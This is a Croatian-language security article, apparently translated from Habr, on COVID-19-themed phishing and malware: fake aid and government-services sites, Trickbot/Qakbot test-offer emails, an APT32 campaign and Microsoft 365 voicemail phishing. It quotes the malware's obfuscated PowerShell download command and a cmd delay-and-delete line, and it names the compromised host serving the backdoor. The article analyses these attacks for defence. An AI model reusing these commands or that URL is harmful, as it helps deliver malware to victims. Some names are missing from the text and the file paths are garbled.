Napadači nastavljaju iskorištavati temu COVID-19, stvarajući sve više prijetnji za korisnike koji su živo zainteresirani za sve vezano uz epidemiju. U Već smo govorili o tome koje su se vrste zlonamjernog softvera pojavile nakon koronavirusa, a danas ćemo govoriti o tehnikama društvenog inženjeringa s kojima su se korisnici u različitim zemljama, uključujući Rusiju, već susreli. Opći trendovi i primjeri su pod rezom.
Sjeti se u Razgovarali smo o tome da su ljudi voljni čitati ne samo o koronavirusu i tijeku epidemije, već i o mjerama financijske potpore? Evo dobrog primjera. Zanimljiv phishing napad otkriven je u njemačkoj pokrajini Sjeverna Rajna-Vestfalija ili NRW. Napadači su izradili kopije web stranice Ministarstva gospodarstva (), gdje se svatko može prijaviti za novčanu pomoć. Takav program zapravo postoji i pokazalo se da je koristan za prevarante. Nakon što su dobili osobne podatke svojih žrtava, prijavili su se na web stranici pravog ministarstva, ali su naveli druge bankovne podatke. Prema službenim podacima, do otkrivanja sheme poslano je 4 tisuće takvih lažnih zahtjeva. Zbog toga je 109 milijuna dolara namijenjenih pogođenim građanima palo u ruke prevarantima.
Želite li besplatno testiranje na COVID-19?
Još jedan značajan primjer phishinga na temu koronavirusa bio je u e-mailovima. Poruke su privukle pažnju korisnika ponudom besplatnog testiranja na zarazu koronavirusom. U prilogu ovih bilo je slučajeva Trickbota/Qakbota/Qbota. A kada su oni koji su željeli provjeriti svoje zdravlje počeli "ispunjavati priloženi obrazac", na računalo je preuzeta zlonamjerna skripta. A kako bi se izbjeglo testiranje u sandboxingu, skripta je počela preuzimati glavni virus tek nakon nekog vremena, kada su zaštitni sustavi bili uvjereni da neće doći do zlonamjerne aktivnosti.
Također je bilo lako uvjeriti većinu korisnika da omoguće makronaredbe. Za to je korišten standardni trik: da biste ispunili upitnik, prvo morate omogućiti makronaredbe, što znači da morate pokrenuti VBA skriptu.
Kao što vidite, VBA skripta je posebno maskirana od antivirusa.
Windows ima značajku čekanja gdje aplikacija čeka /T <sekundi> prije prihvaćanja zadanog odgovora "Da". U našem slučaju, skripta je čekala 65 sekundi prije brisanja privremenih datoteka:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
I dok se čekalo, malware je preuzet. Za to je pokrenuta posebna PowerShell skripta:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Nakon dekodiranja Base64 vrijednosti, skripta PowerShell preuzima backdoor koji se nalazi na prethodno hakiranom web poslužitelju iz Njemačke:
http://automatischer-staubsauger.com/feature/777777.pngi sprema ga pod imenom:
C:UsersPublictmpdirfile1.exe
Mapa ‘C:UsersPublictmpdir’ se briše prilikom pokretanja datoteke 'tmps1.bat' koja sadrži naredbu cmd /c mkdir ""C:UsersPublictmpdir"".
Ciljani napad na vladine agencije
Osim toga, analitičari FireEyea nedavno su izvijestili o ciljanom napadu APT32 usmjerenom na vladine strukture u Wuhanu, kao i na kinesko Ministarstvo upravljanja hitnim situacijama. Jedan od distribuiranih RTF-ova sadržavao je poveznicu na članak New York Timesa pod naslovom . Međutim, nakon čitanja zlonamjerni softver je preuzet (analitičari FireEye identificirali su instancu kao METALJACK).
Zanimljivo, u vrijeme otkrivanja niti jedan antivirus nije otkrio ovu instancu, prema Virustotalu.
Kada službene web stranice ne rade
Najupečatljiviji primjer phishing napada dogodio se u Rusiji neki dan. Razlog za to bilo je imenovanje dugo očekivane naknade za djecu od 3 do 16 godina. Kada je 12. svibnja 2020. objavljen početak primanja prijava, milijuni su pohrlili na web stranicu državnih službi po dugo očekivanu pomoć i srušili portal ništa gore od profesionalnog DDoS napada. Kad je predsjednik rekao da se "državne službe ne mogu nositi s protokom prijava", ljudi su na internetu počeli pričati o pokretanju alternativne stranice za prihvaćanje prijava.
Problem je u tome što je nekoliko stranica počelo raditi odjednom, a dok jedna, prava na posobie16.gosuslugi.ru, zapravo prihvaća prijave, više .
Kolege iz SearchInform-a pronašli su oko 30 novih lažnih domena u .ru zoni. Tvrtke Infosecurity i Softline pratile su više od 70 sličnih lažnih web stranica državnih službi od početka travnja. Njihovi tvorci manipuliraju poznatim simbolima i također koriste kombinacije riječi gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie i tako dalje.
Hype i društveni inženjering
Svi ovi primjeri samo potvrđuju da napadači uspješno monetiziraju temu koronavirusa. A što su društvene napetosti veće i što su pitanja nejasnija, to su veće šanse da prevaranti ukradu važne podatke, natjeraju ljude da se sami odreknu svog novca ili jednostavno hakiraju više računala.
A s obzirom na to da je pandemija natjerala potencijalno nespremne ljude da masovno rade od kuće, ugroženi su ne samo osobni, već i korporativni podaci. Na primjer, nedavno su korisnici sustava Microsoft 365 (bivši Office 365) također bili izloženi napadu krađe identiteta. Ljudi su primali masovne "propuštene" glasovne poruke kao priloge pismima. Međutim, datoteke su zapravo bile HTML stranica na koju su slane žrtve napada . Posljedica toga je gubitak pristupa i ugrožavanje svih podataka s računa.
Izvor: www.habr.com